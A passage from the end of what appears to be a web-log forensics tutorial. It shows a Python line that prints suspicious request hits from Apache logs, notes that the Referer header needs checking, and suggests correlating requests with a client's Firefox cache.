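        print(f"{hit['time']} {hit['client']} {hit['where']}[{hit['param']}]: {hit['payload']}")
```

Checking the Referer as well as the request line matters here: the page's own entry carries the payload only in the Referer of a later request to security.php.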

Before we go …
let’s assume we had access to the client that made this request. If we look at the logs above, we already know this user “seems” to be using Firefox. Assuming that is correct, we could take a look at the Firefox “cache” to see if this user did make this request, and correlate this back to our logs.

The image below shows what this would look like.


Well that’s all folks!!!

Reference:
1. Apache Log Files
2. 21.8. urllib.parse — Parse URLs into components